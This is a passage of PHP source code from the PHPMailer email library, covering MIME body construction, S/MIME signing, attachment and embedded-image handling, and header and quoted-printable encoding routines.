  1663.                 $body .= $this->LE . $this->LE;
  1664.                 $body .= $this->attachAll('inline', $this->boundary[1]);
  1665.                 break;
  1666.             case 'attach':
  1667.                 $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
  1668.                 $body .= $this->encodeString($this->Body, $bodyEncoding);
  1669.                 $body .= $this->LE . $this->LE;
  1670.                 $body .= $this->attachAll('attachment', $this->boundary[1]);
  1671.                 break;
  1672.             case 'inline_attach':
  1673.                 $body .= $this->textLine('--' . $this->boundary[1]);
  1674.                 $body .= $this->headerLine('Content-Type', 'multipart/related;');
  1675.                 $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
  1676.                 $body .= $this->LE;
  1677.                 $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, '', $bodyEncoding);
  1678.                 $body .= $this->encodeString($this->Body, $bodyEncoding);
  1679.                 $body .= $this->LE . $this->LE;
  1680.                 $body .= $this->attachAll('inline', $this->boundary[2]);
  1681.                 $body .= $this->LE;
  1682.                 $body .= $this->attachAll('attachment', $this->boundary[1]);
  1683.                 break;
  1684.             case 'alt':
  1685.                 $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
  1686.                 $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
  1687.                 $body .= $this->LE . $this->LE;
  1688.                 $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, 'text/html', $bodyEncoding);
  1689.                 $body .= $this->encodeString($this->Body, $bodyEncoding);
  1690.                 $body .= $this->LE . $this->LE;
  1691.                 if (!empty($this->Ical)) {
  1692.                     $body .= $this->getBoundary($this->boundary[1], '', 'text/calendar; method=REQUEST', '');
  1693.                     $body .= $this->encodeString($this->Ical, $this->Encoding);
  1694.                     $body .= $this->LE . $this->LE;
  1695.                 }
  1696.                 $body .= $this->endBoundary($this->boundary[1]);
  1697.                 break;
  1698.             case 'alt_inline':
  1699.                 $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
  1700.                 $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
  1701.                 $body .= $this->LE . $this->LE;
  1702.                 $body .= $this->textLine('--' . $this->boundary[1]);
  1703.                 $body .= $this->headerLine('Content-Type', 'multipart/related;');
  1704.                 $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
  1705.                 $body .= $this->LE;
  1706.                 $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
  1707.                 $body .= $this->encodeString($this->Body, $bodyEncoding);
  1708.                 $body .= $this->LE . $this->LE;
  1709.                 $body .= $this->attachAll('inline', $this->boundary[2]);
  1710.                 $body .= $this->LE;
  1711.                 $body .= $this->endBoundary($this->boundary[1]);
  1712.                 break;
  1713.             case 'alt_attach':
  1714.                 $body .= $this->textLine('--' . $this->boundary[1]);
  1715.                 $body .= $this->headerLine('Content-Type', 'multipart/alternative;');
  1716.                 $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
  1717.                 $body .= $this->LE;
  1718.                 $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
  1719.                 $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
  1720.                 $body .= $this->LE . $this->LE;
  1721.                 $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
  1722.                 $body .= $this->encodeString($this->Body, $bodyEncoding);
  1723.                 $body .= $this->LE . $this->LE;
  1724.                 $body .= $this->endBoundary($this->boundary[2]);
  1725.                 $body .= $this->LE;
  1726.                 $body .= $this->attachAll('attachment', $this->boundary[1]);
  1727.                 break;
  1728.             case 'alt_inline_attach':
  1729.                 $body .= $this->textLine('--' . $this->boundary[1]);
  1730.                 $body .= $this->headerLine('Content-Type', 'multipart/alternative;');
  1731.                 $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
  1732.                 $body .= $this->LE;
  1733.                 $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
  1734.                 $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
  1735.                 $body .= $this->LE . $this->LE;
  1736.                 $body .= $this->textLine('--' . $this->boundary[2]);
  1737.                 $body .= $this->headerLine('Content-Type', 'multipart/related;');
  1738.                 $body .= $this->textLine("\tboundary=\"" . $this->boundary[3] . '"');
  1739.                 $body .= $this->LE;
  1740.                 $body .= $this->getBoundary($this->boundary[3], $bodyCharSet, 'text/html', $bodyEncoding);
  1741.                 $body .= $this->encodeString($this->Body, $bodyEncoding);
  1742.                 $body .= $this->LE . $this->LE;
  1743.                 $body .= $this->attachAll('inline', $this->boundary[3]);
  1744.                 $body .= $this->LE;
  1745.                 $body .= $this->endBoundary($this->boundary[2]);
  1746.                 $body .= $this->LE;
  1747.                 $body .= $this->attachAll('attachment', $this->boundary[1]);
  1748.                 break;
  1749.             default:
  1750.                 // catch case 'plain' and case ''
  1751.                 $body .= $this->encodeString($this->Body, $bodyEncoding);
  1752.                 break;
  1753.         }
  1754.         if ($this->isError()) {
  1755.             $body = '';
  1756.         } elseif ($this->sign_key_file) {
  1757.             try {
  1758.                 if (!defined('PKCS7_TEXT')) {
  1759.                     throw new phpmailerException($this->lang('signing') . ' OpenSSL extension missing.');
  1760.                 }
  1761.                 // @TODO would be nice to use php://temp streams here, but need to wrap for PHP < 5.1
  1762.                 $file = tempnam(sys_get_temp_dir(), 'mail');
  1763.                 if (false === file_put_contents($file, $body)) {
  1764.                     throw new phpmailerException($this->lang('signing') . ' Could not write temp file');
  1765.                 }
  1766.                 $signed = tempnam(sys_get_temp_dir(), 'signed');
  1767.                 if (@openssl_pkcs7_sign(
  1768.                     $file,
  1769.                     $signed,
  1770.                     'file://' . realpath($this->sign_cert_file),
  1771.                     array('file://' . realpath($this->sign_key_file), $this->sign_key_pass),
  1772.                     null
  1773.                 )
  1774.                 ) {
  1775.                     @unlink($file);
  1776.                     $body = file_get_contents($signed);
  1777.                     @unlink($signed);
  1778.                 } else {
  1779.                     @unlink($file);
  1780.                     @unlink($signed);
  1781.                     throw new phpmailerException($this->lang('signing') . openssl_error_string());
  1782.                 }
  1783.             } catch (phpmailerException $exc) {
  1784.                 $body = '';
  1785.                 if ($this->exceptions) {
  1786.                     throw $exc;
  1787.                 }
  1788.             }
  1789.         }
  1790.         return $body;
  1791.     }
  1792.     protected function getBoundary($boundary, $charSet, $contentType, $encoding)
  1793.     {
  1794.         $result = '';
  1795.         if ($charSet == '') {
  1796.             $charSet = $this->CharSet;
  1797.         }
  1798.         if ($contentType == '') {
  1799.             $contentType = $this->ContentType;
  1800.         }
  1801.         if ($encoding == '') {
  1802.             $encoding = $this->Encoding;
  1803.         }
  1804.         $result .= $this->textLine('--' . $boundary);
  1805.         $result .= sprintf('Content-Type: %s; charset=%s', $contentType, $charSet);
  1806.         $result .= $this->LE;
  1807.         // RFC1341 part 5 says 7bit is assumed if not specified
  1808.         if ($encoding != '7bit') {
  1809.             $result .= $this->headerLine('Content-Transfer-Encoding', $encoding);
  1810.         }
  1811.         $result .= $this->LE;
  1812.         return $result;
  1813.     }
  1814.     protected function endBoundary($boundary)
  1815.     {
  1816.         return $this->LE . '--' . $boundary . '--' . $this->LE;
  1817.     }
  1818.     protected function setMessageType()
  1819.     {
  1820.         $type = array();
  1821.         if ($this->alternativeExists()) {
  1822.             $type[] = 'alt';
  1823.         }
  1824.         if ($this->inlineImageExists()) {
  1825.             $type[] = 'inline';
  1826.         }
  1827.         if ($this->attachmentExists()) {
  1828.             $type[] = 'attach';
  1829.         }
  1830.         $this->message_type = implode('_', $type);
  1831.         if ($this->message_type == '') {
  1832.             $this->message_type = 'plain';
  1833.         }
  1834.     }
  1835.     public function headerLine($name, $value)
  1836.     {
  1837.         return $name . ': ' . $value . $this->LE;
  1838.     }
  1839.     public function textLine($value)
  1840.     {
  1841.         return $value . $this->LE;
  1842.     }
  1843.     public function addAttachment($path, $name = '', $encoding = 'base64', $type = '', $disposition = 'attachment')
  1844.     {
  1845.         try {
  1846.             if (!@is_file($path)) {
  1847.                 throw new phpmailerException($this->lang('file_access') . $path, self::STOP_CONTINUE);
  1848.             }
  1849.             // If a MIME type is not specified, try to work it out from the file name
  1850.             if ($type == '') {
  1851.                 $type = self::filenameToType($path);
  1852.             }
  1853.             $filename = basename($path);
  1854.             if ($name == '') {
  1855.                 $name = $filename;
  1856.             }
  1857.             $this->attachment[] = array(
  1858.                 0 => $path,
  1859.                 1 => $filename,
  1860.                 2 => $name,
  1861.                 3 => $encoding,
  1862.                 4 => $type,
  1863.                 5 => false, // isStringAttachment
  1864.                 6 => $disposition,
  1865.                 7 => 0
  1866.             );
  1867.         } catch (phpmailerException $exc) {
  1868.             $this->setError($exc->getMessage());
  1869.             $this->edebug($exc->getMessage());
  1870.             if ($this->exceptions) {
  1871.                 throw $exc;
  1872.             }
  1873.             return false;
  1874.         }
  1875.         return true;
  1876.     }
  1877.     public function getAttachments()
  1878.     {
  1879.         return $this->attachment;
  1880.     }
  1881.     protected function attachAll($disposition_type, $boundary)
  1882.     {
  1883.         // Return text of body
  1884.         $mime = array();
  1885.         $cidUniq = array();
  1886.         $incl = array();
  1887.         // Add all attachments
  1888.         foreach ($this->attachment as $attachment) {
  1889.             // Check if it is a valid disposition_filter
  1890.             if ($attachment[6] == $disposition_type) {
  1891.                 // Check for string attachment
  1892.                 $string = '';
  1893.                 $path = '';
  1894.                 $bString = $attachment[5];
  1895.                 if ($bString) {
  1896.                     $string = $attachment[0];
  1897.                 } else {
  1898.                     $path = $attachment[0];
  1899.                 }
  1900.                 $inclhash = md5(serialize($attachment));
  1901.                 if (in_array($inclhash, $incl)) {
  1902.                     continue;
  1903.                 }
  1904.                 $incl[] = $inclhash;
  1905.                 $name = $attachment[2];
  1906.                 $encoding = $attachment[3];
  1907.                 $type = $attachment[4];
  1908.                 $disposition = $attachment[6];
  1909.                 $cid = $attachment[7];
  1910.                 if ($disposition == 'inline' && isset($cidUniq[$cid])) {
  1911.                     continue;
  1912.                 }
  1913.                 $cidUniq[$cid] = true;
  1914.                 $mime[] = sprintf('--%s%s', $boundary, $this->LE);
  1915.                 $mime[] = sprintf(
  1916.                     'Content-Type: %s; name="%s"%s',
  1917.                     $type,
  1918.                     $this->encodeHeader($this->secureHeader($name)),
  1919.                     $this->LE
  1920.                 );
  1921.                 // RFC1341 part 5 says 7bit is assumed if not specified
  1922.                 if ($encoding != '7bit') {
  1923.                     $mime[] = sprintf('Content-Transfer-Encoding: %s%s', $encoding, $this->LE);
  1924.                 }
  1925.                 if ($disposition == 'inline') {
  1926.                     $mime[] = sprintf('Content-ID: <%s>%s', $cid, $this->LE);
  1927.                 }
  1928.                 // If a filename contains any of these chars, it should be quoted,
  1929.                 // but not otherwise: RFC2183 & RFC2045 5.1
  1930.                 // Fixes a warning in IETF's msglint MIME checker
  1931.                 // Allow for bypassing the Content-Disposition header totally
  1932.                 if (!(empty($disposition))) {
  1933.                     $encoded_name = $this->encodeHeader($this->secureHeader($name));
  1934.                     if (preg_match('/[ \(\)<>@,;:\\"\/\[\]\?=]/', $encoded_name)) {
  1935.                         $mime[] = sprintf(
  1936.                             'Content-Disposition: %s; filename="%s"%s',
  1937.                             $disposition,
  1938.                             $encoded_name,
  1939.                             $this->LE . $this->LE
  1940.                         );
  1941.                     } else {
  1942.                         $mime[] = sprintf(
  1943.                             'Content-Disposition: %s; filename=%s%s',
  1944.                             $disposition,
  1945.                             $encoded_name,
  1946.                             $this->LE . $this->LE
  1947.                         );
  1948.                     }
  1949.                 } else {
  1950.                     $mime[] = $this->LE;
  1951.                 }
  1952.                 // Encode as string attachment
  1953.                 if ($bString) {
  1954.                     $mime[] = $this->encodeString($string, $encoding);
  1955.                     if ($this->isError()) {
  1956.                         return '';
  1957.                     }
  1958.                     $mime[] = $this->LE . $this->LE;
  1959.                 } else {
  1960.                     $mime[] = $this->encodeFile($path, $encoding);
  1961.                     if ($this->isError()) {
  1962.                         return '';
  1963.                     }
  1964.                     $mime[] = $this->LE . $this->LE;
  1965.                 }
  1966.             }
  1967.         }
  1968.         $mime[] = sprintf('--%s--%s', $boundary, $this->LE);
  1969.         return implode('', $mime);
  1970.     }
  1971.     protected function encodeFile($path, $encoding = 'base64')
  1972.     {
  1973.         try {
  1974.             if (!is_readable($path)) {
  1975.                 throw new phpmailerException($this->lang('file_open') . $path, self::STOP_CONTINUE);
  1976.             }
  1977.             $magic_quotes = get_magic_quotes_runtime();
  1978.             if ($magic_quotes) {
  1979.                 if (version_compare(PHP_VERSION, '5.3.0', '<')) {
  1980.                     set_magic_quotes_runtime(false);
  1981.                 } else {
  1982.                     ini_set('magic_quotes_runtime', 0);
  1983.                 }
  1984.             }
  1985.             $file_buffer = file_get_contents($path);
  1986.             $file_buffer = $this->encodeString($file_buffer, $encoding);
  1987.             if ($magic_quotes) {
  1988.                 if (version_compare(PHP_VERSION, '5.3.0', '<')) {
  1989.                     set_magic_quotes_runtime($magic_quotes);
  1990.                 } else {
  1991.                     ini_set('magic_quotes_runtime', ($magic_quotes?'1':'0'));
  1992.                 }
  1993.             }
  1994.             return $file_buffer;
  1995.         } catch (Exception $exc) {
  1996.             $this->setError($exc->getMessage());
  1997.             return '';
  1998.         }
  1999.     }
  2000.     public function encodeString($str, $encoding = 'base64')
  2001.     {
  2002.         $encoded = '';
  2003.         switch (strtolower($encoding)) {
  2004.             case 'base64':
  2005.                 $encoded = chunk_split(base64_encode($str), 76, $this->LE);
  2006.                 break;
  2007.             case '7bit':
  2008.             case '8bit':
  2009.                 $encoded = $this->fixEOL($str);
  2010.                 // Make sure it ends with a line break
  2011.                 if (substr($encoded, -(strlen($this->LE))) != $this->LE) {
  2012.                     $encoded .= $this->LE;
  2013.                 }
  2014.                 break;
  2015.             case 'binary':
  2016.                 $encoded = $str;
  2017.                 break;
  2018.             case 'quoted-printable':
  2019.                 $encoded = $this->encodeQP($str);
  2020.                 break;
  2021.             default:
  2022.                 $this->setError($this->lang('encoding') . $encoding);
  2023.                 break;
  2024.         }
  2025.         return $encoded;
  2026.     }
  2027.     public function encodeHeader($str, $position = 'text')
  2028.     {
  2029.         $matchcount = 0;
  2030.         switch (strtolower($position)) {
  2031.             case 'phrase':
  2032.                 if (!preg_match('/[\200-\377]/', $str)) {
  2033.                     // Can't use addslashes as we don't know the value of magic_quotes_sybase
  2034.                     $encoded = addcslashes($str, "\0..\37\177\\\"");
  2035.                     if (($str == $encoded) && !preg_match('/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str)) {
  2036.                         return ($encoded);
  2037.                     } else {
  2038.                         return ("\"$encoded\"");
  2039.                     }
  2040.                 }
  2041.                 $matchcount = preg_match_all('/[^\040\041\043-\133\135-\176]/', $str, $matches);
  2042.                 break;
  2043.             /** @noinspection PhpMissingBreakStatementInspection */
  2044.             case 'comment':
  2045.                 $matchcount = preg_match_all('/[()"]/', $str, $matches);
  2046.                 // Intentional fall-through
  2047.             case 'text':
  2048.             default:
  2049.                 $matchcount += preg_match_all('/[\000-\010\013\014\016-\037\177-\377]/', $str, $matches);
  2050.                 break;
  2051.         }
  2052.         if ($matchcount == 0) { // There are no chars that need encoding
  2053.             return ($str);
  2054.         }
  2055.         $maxlen = 75 - 7 - strlen($this->CharSet);
  2056.         // Try to select the encoding which should produce the shortest output
  2057.         if ($matchcount > strlen($str) / 3) {
  2058.             // More than a third of the content will need encoding, so B encoding will be most efficient
  2059.             $encoding = 'B';
  2060.             if (function_exists('mb_strlen') && $this->hasMultiBytes($str)) {
  2061.                 $encoded = $this->base64EncodeWrapMB($str, "\n");
  2062.             } else {
  2063.                 $encoded = base64_encode($str);
  2064.                 $maxlen -= $maxlen % 4;
  2065.                 $encoded = trim(chunk_split($encoded, $maxlen, "\n"));
  2066.             }
  2067.         } else {
  2068.             $encoding = 'Q';
  2069.             $encoded = $this->encodeQ($str, $position);
  2070.             $encoded = $this->wrapText($encoded, $maxlen, true);
  2071.             $encoded = str_replace('=' . self::CRLF, "\n", trim($encoded));
  2072.         }
  2073.         $encoded = preg_replace('/^(.*)$/m', ' =?' . $this->CharSet . "?$encoding?\\1?=", $encoded);
  2074.         $encoded = trim(str_replace("\n", $this->LE, $encoded));
  2075.         return $encoded;
  2076.     }
  2077.  
  2078.     public function hasMultiBytes($str)
  2079.     {
  2080.         if (function_exists('mb_strlen')) {
  2081.             return (strlen($str) > mb_strlen($str, $this->CharSet));
  2082.         } else { // Assume no multibytes (we can't handle without mbstring functions anyway)
  2083.             return false;
  2084.         }
  2085.     }
  2086.  
  2087.     public function has8bitChars($text)
  2088.     {
  2089.         return (boolean)preg_match('/[\x80-\xFF]/', $text);
  2090.     }
  2091.  
  2092.     public function base64EncodeWrapMB($str, $linebreak = null)
  2093.     {
  2094.         $start = '=?' . $this->CharSet . '?B?';
  2095.         $end = '?=';
  2096.         $encoded = '';
  2097.         if ($linebreak === null) {
  2098.             $linebreak = $this->LE;
  2099.         }
  2100.         $mb_length = mb_strlen($str, $this->CharSet);
  2101.         // Each line must have length <= 75, including $start and $end
  2102.         $length = 75 - strlen($start) - strlen($end);
  2103.         // Average multi-byte ratio
  2104.         $ratio = $mb_length / strlen($str);
  2105.         // Base64 has a 4:3 ratio
  2106.         $avgLength = floor($length * $ratio * .75);
  2107.         for ($i = 0; $i < $mb_length; $i += $offset) {
  2108.             $lookBack = 0;
  2109.             do {
  2110.                 $offset = $avgLength - $lookBack;
  2111.                 $chunk = mb_substr($str, $i, $offset, $this->CharSet);
  2112.                 $chunk = base64_encode($chunk);
  2113.                 $lookBack++;
  2114.             } while (strlen($chunk) > $length);
  2115.             $encoded .= $chunk . $linebreak;
  2116.         }
  2117.         // Chomp the last linefeed
  2118.         $encoded = substr($encoded, 0, -strlen($linebreak));
  2119.         return $encoded;
  2120.     }
  2121.  
  2122.     public function encodeQP($string, $line_max = 76)
  2123.     {
  2124.         if (function_exists('quoted_printable_encode')) { // Use native function if it's available (>= PHP5.3)
  2125.             return $this->fixEOL(quoted_printable_encode($string));
  2126.         }
  2127.         // Fall back to a pure PHP implementation
  2128.         $string = str_replace(
  2129.             array('%20', '%0D%0A.', '%0D%0A', '%'),
  2130.             array(' ', "\r\n=2E", "\r\n", '='),
  2131.             rawurlencode($string)
  2132.         );
  2133.         $string = preg_replace('/[^\r\n]{' . ($line_max - 3) . '}[^=\r\n]{2}/', "$0=\r\n", $string);
  2134.         return $this->fixEOL($string);
  2135.     }
  2136.  
  2137.     public function encodeQPphp(
  2138.         $string,
  2139.         $line_max = 76,
  2140.         /** @noinspection PhpUnusedParameterInspection */ $space_conv = false
  2141.     ) {
  2142.         return $this->encodeQP($string, $line_max);
  2143.     }
  2144.  
  2145.     public function encodeQ($str, $position = 'text')
  2146.     {
  2147.         // There should not be any EOL in the string
  2148.         $pattern = '';
  2149.         $encoded = str_replace(array("\r", "\n"), '', $str);
  2150.         switch (strtolower($position)) {
  2151.             case 'phrase':
  2152.                 // RFC 2047 section 5.3
  2153.                 $pattern = '^A-Za-z0-9!*+\/ -';
  2154.                 break;
  2155.             /** @noinspection PhpMissingBreakStatementInspection */
  2156.             case 'comment':
  2157.                 // RFC 2047 section 5.2
  2158.                 $pattern = '\(\)"';
  2159.             case 'text':
  2160.             default:
  2161.                 $pattern = '\000-\011\013\014\016-\037\075\077\137\177-\377' . $pattern;
  2162.                 break;
  2163.         }
  2164.         $matches = array();
  2165.         if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) {
  2166.             $eqkey = array_search('=', $matches[0]);
  2167.             if (false !== $eqkey) {
  2168.                 unset($matches[0][$eqkey]);
  2169.                 array_unshift($matches[0], '=');
  2170.             }
  2171.             foreach (array_unique($matches[0]) as $char) {
  2172.                 $encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded);
  2173.             }
  2174.         }
  2175.         // Replace every spaces to _ (more readable than =20)
  2176.         return str_replace(' ', '_', $encoded);
  2177.     }
  2178.  
  2179.     public function addStringAttachment(
  2180.         $string,
  2181.         $filename,
  2182.         $encoding = 'base64',
  2183.         $type = '',
  2184.         $disposition = 'attachment'
  2185.     ) {
  2186.         // If a MIME type is not specified, try to work it out from the file name
  2187.         if ($type == '') {
  2188.             $type = self::filenameToType($filename);
  2189.         }
  2190.         // Append to $attachment array
  2191.         $this->attachment[] = array(
  2192.             0 => $string,
  2193.             1 => $filename,
  2194.             2 => basename($filename),
  2195.             3 => $encoding,
  2196.             4 => $type,
  2197.             5 => true, // isStringAttachment
  2198.             6 => $disposition,
  2199.             7 => 0
  2200.         );
  2201.     }
  2202.     public function addEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = '', $disposition = 'inline')
  2203.     {
  2204.         if (!@is_file($path)) {
  2205.             $this->setError($this->lang('file_access') . $path);
  2206.             return false;
  2207.         }
  2208.         // If a MIME type is not specified, try to work it out from the file name
  2209.         if ($type == '') {
  2210.             $type = self::filenameToType($path);
  2211.         }
  2212.         $filename = basename($path);
  2213.         if ($name == '') {
  2214.             $name = $filename;
  2215.         }
  2216.         // Append to $attachment array
  2217.         $this->attachment[] = array(
  2218.             0 => $path,
  2219.             1 => $filename,
  2220.             2 => $name,
  2221.             3 => $encoding,
  2222.             4 => $type,
  2223.             5 => false, // isStringAttachment
  2224.             6 => $disposition,
  2225.             7 => $cid
  2226.         );
  2227.         return true;
  2228.     }
  2229.  
  2230.     public function addStringEmbeddedImage(
  2231.         $string,
  2232.         $cid,
  2233.         $name = '',
  2234.         $encoding = 'base64',
  2235.         $type = '',
  2236.         $disposition = 'inline'
  2237.     ) {
  2238.         // If a MIME type is not specified, try to work it out from the name
  2239.         if ($type == '') {
  2240.             $type = self::filenameToType($name);
  2241.         }
  2242.         // Append to $attachment array
  2243.         $this->attachment[] = array(
  2244.             0 => $string,
  2245.             1 => $name,
  2246.             2 => $name,
  2247.             3 => $encoding,
  2248.             4 => $type,
  2249.             5 => true, // isStringAttachment
  2250.             6 => $disposition,
  2251.             7 => $cid
  2252.         );
  2253.         return true;
  2254.     }
  2255.     public function inlineImageExists()
  2256.     {
  2257.         foreach ($this->attachment as $attachment) {
  2258.             if ($attachment[6] == 'inline') {
  2259.                 return true;
  2260.             }
  2261.         }
  2262.         return false;
  2263.     }
  2264.     public function attachmentExists()
  2265.     {
  2266.         foreach ($this->attachment as $attachment) {
  2267.             if ($attachment[6] == 'attachment') {
  2268.                 return true;
  2269.             }
  2270.         }
  2271.         return false;
  2272.     }
  2273.     public function alternativeExists()
  2274.     {
  2275.         return !empty($this->AltBody);
  2276.     }
  2277.     public function clearAddresses()
  2278.     {
  2279.         foreach ($this->to as $to) {
  2280.             unset($this->all_recipients[strtolower($to[0])]);
  2281.         }
  2282.         $this->to = array();
  2283.     }
  2284.     public function clearCCs()
  2285.     {
  2286.         foreach ($this->cc as $cc) {
  2287.             unset($this->all_recipients[strtolower($cc[0])]);
  2288.         }
  2289.         $this->cc = array();
  2290.     }
  2291.     public function clearBCCs()
  2292.     {
  2293.         foreach ($this->bcc as $bcc) {
  2294.             unset($this->all_recipients[strtolower($bcc[0])]);
  2295.         }
  2296.         $this->bcc = array();
  2297.     }
  2298.     public function clearReplyTos()
  2299.     {
  2300.         $this->ReplyTo = array();
  2301.     }
  2302.  
  2303.     public function clearAllRecipients()
  2304.     {
  2305.         $this->to = array();
  2306.         $this->cc = array();
  2307.         $this->bcc = array();
  2308.         $this->all_recipients = array();
  2309.     }
  2310.     public function clearAttachments()
  2311.     {
  2312.         $this->attachment = array();
  2313.     }
  2314.     public function clearCustomHeaders()
  2315.     {
  2316.         $this->CustomHeader = array();
  2317.     }
  2318.     protected function setError($msg)
  2319.     {
  2320.         $this->error_count++;
  2321.         if ($this->Mailer == 'smtp' and !is_null($this->smtp)) {
  2322.             $lasterror = $this->smtp->getError();
  2323.             if (!empty($lasterror) and array_key_exists('smtp_msg', $lasterror)) {
  2324.                 $msg .= '<p>' . $this->lang('smtp_error') . $lasterror['smtp_msg'] . "</p>\n";
  2325.             }
  2326.         }
  2327.         $this->ErrorInfo = $msg;
  2328.     }
  2329.     public static function rfcDate()
  2330.     {
  2331.         // Set the time zone to whatever the default is to avoid 500 errors
  2332.         // Will default to UTC if it's not set properly in php.ini
  2333.         date_default_timezone_set(@date_default_timezone_get());
  2334.         return date('D, j M Y H:i:s O');
  2335.     }
  2336.     protected function serverHostname()
  2337.     {
  2338.         $result = 'localhost.localdomain';
  2339.         if (!empty($this->Hostname)) {
  2340.             $result = $this->Hostname;
  2341.         } elseif (isset($_SERVER) and array_key_exists('SERVER_NAME', $_SERVER) and !empty($_SERVER['SERVER_NAME'])) {
  2342.             $result = $_SERVER['SERVER_NAME'];
  2343.         } elseif (function_exists('gethostname') && gethostname() !== false) {
  2344.             $result = gethostname();
  2345.         } elseif (php_uname('n') !== false) {
  2346.             $result = php_uname('n');
  2347.         }
  2348.         return $result;
  2349.     }
  2350.     protected function lang($key)
  2351.     {
  2352.         if (count($this->language) < 1) {
  2353.             $this->setLanguage('en'); // set the default language
  2354.         }
  2355.         if (isset($this->language[$key])) {
  2356.             return $this->language[$key];
  2357.         } else {
  2358.             return 'Language string failed to load: ' . $key;
  2359.         }
  2360.     }
  2361.     public function isError()
  2362.     {
  2363.         return ($this->error_count > 0);
  2364.     }
  2365.     public function fixEOL($str)
  2366.     {
  2367.         // Normalise to \n
  2368.         $nstr = str_replace(array("\r\n", "\r"), "\n", $str);
  2369.         // Now convert LE as needed
  2370.         if ($this->LE !== "\n") {
  2371.             $nstr = str_replace("\n", $this->LE, $nstr);
  2372.         }
  2373.         return $nstr;
  2374.     }
  2375.  
  2376.     public function addCustomHeader($name, $value = null)
  2377.     {
  2378.         if ($value === null) {
  2379.             // Value passed in as name:value
  2380.             $this->CustomHeader[] = explode(':', $name, 2);
  2381.         } else {
  2382.             $this->CustomHeader[] = array($name, $value);
  2383.         }
  2384.     }
  2385.     public function msgHTML($message, $basedir = '', $advanced = false)
  2386.     {
  2387.         preg_match_all('/(src|background)=["\'](.*)["\']/Ui', $message, $images);
  2388.         if (isset($images[2])) {
  2389.             foreach ($images[2] as $imgindex => $url) {
  2390.                 // Convert data URIs into embedded images
  2391.                 if (preg_match('#^data:(image[^;,]*)(;base64)?,#', $url, $match)) {
  2392.                     $data = substr($url, strpos($url, ','));
  2393.                     if ($match[2]) {
  2394.                         $data = base64_decode($data);
  2395.                     } else {
  2396.                         $data = rawurldecode($data);
  2397.                     }
  2398.                     $cid = md5($url) . '@phpmailer.0'; // RFC2392 S 2
  2399.                     if ($this->addStringEmbeddedImage($data, $cid, '', 'base64', $match[1])) {
  2400.                         $message = str_replace(
  2401.                             $images[0][$imgindex],
  2402.                             $images[1][$imgindex] . '="cid:' . $cid . '"',
  2403.                             $message
  2404.                         );
  2405.                     }
  2406.                 } elseif (!preg_match('#^[A-z]+://#', $url)) {
  2407.                     // Do not change urls for absolute images (thanks to corvuscorax)
  2408.                     $filename = basename($url);
  2409.                     $directory = dirname($url);
  2410.                     if ($directory == '.') {
  2411.                         $directory = '';
  2412.                     }
  2413.                     $cid = md5($url) . '@phpmailer.0'; // RFC2392 S 2
  2414.                     if (strlen($basedir) > 1 && substr($basedir, -1) != '/') {
  2415.                         $basedir .= '/';
  2416.                     }
  2417.                     if (strlen($directory) > 1 && substr($directory, -1) != '/') {
  2418.                         $directory .= '/';
  2419.                     }
  2420.                     if ($this->addEmbeddedImage(
  2421.                         $basedir . $directory . $filename,
  2422.                         $cid,
  2423.                         $filename,
  2424.                         'base64',
  2425.                         self::_mime_types((string)self::mb_pathinfo($filename, PATHINFO_EXTENSION))
  2426.                     )
  2427.                     ) {
  2428.                         $message = preg_replace(
  2429.                             '/' . $images[1][$imgindex] . '=["\']' . preg_quote($url, '/') . '["\']/Ui',
  2430.                             $images[1][$imgindex] . '="cid:' . $cid . '"',
  2431.                             $message
  2432.                         );
  2433.                     }
  2434.                 }
  2435.             }
  2436.         }
  2437.         $this->isHTML(true);
  2438.         // Convert all message body line breaks to CRLF, makes quoted-printable encoding work much better
  2439.         $this->Body = $this->normalizeBreaks($message);
  2440.         $this->AltBody = $this->normalizeBreaks($this->html2text($message, $advanced));
  2441.         if (empty($this->AltBody)) {
  2442.             $this->AltBody = 'To view this email message, open it in a program that understands HTML!' .
  2443.                 self::CRLF . self::CRLF;
  2444.         }
  2445.         return $this->Body;
  2446.     }
  2447.  
  2448.     public function html2text($html, $advanced = false)
  2449.     {
  2450.         if (is_callable($advanced)) {
  2451.             return call_user_func($advanced, $html);
  2452.         }
  2453.         return html_entity_decode(
  2454.             trim(custom_strip_tags(preg_replace('/<(head|title|style|script)[^>]*>.*?<\/\\1>/si', '', $html))),
  2455.             ENT_QUOTES,
  2456.             $this->CharSet
  2457.         );
  2458.     }
  2459.  
  2460.     public static function _mime_types($ext = '')
  2461.     {
  2462.         $mimes = array(
  2463.             'xl'    => 'application/excel',
  2464.             'js'    => 'application/javascript',
  2465.             'hqx'   => 'application/mac-binhex40',
  2466.             'cpt'   => 'application/mac-compactpro',
  2467.             'bin'   => 'application/macbinary',
  2468.             'doc'   => 'application/msword',
  2469.             'word'  => 'application/msword',
  2470.             'class' => 'application/octet-stream',
  2471.             'dll'   => 'application/octet-stream',
  2472.             'dms'   => 'application/octet-stream',
  2473.             'exe'   => 'application/octet-stream',
  2474.             'lha'   => 'application/octet-stream',
  2475.             'lzh'   => 'application/octet-stream',
  2476.             'psd'   => 'application/octet-stream',
  2477.             'sea'   => 'application/octet-stream',
  2478.             'so'    => 'application/octet-stream',
  2479.             'oda'   => 'application/oda',
  2480.             'pdf'   => 'application/pdf',
  2481.             'ai'    => 'application/postscript',
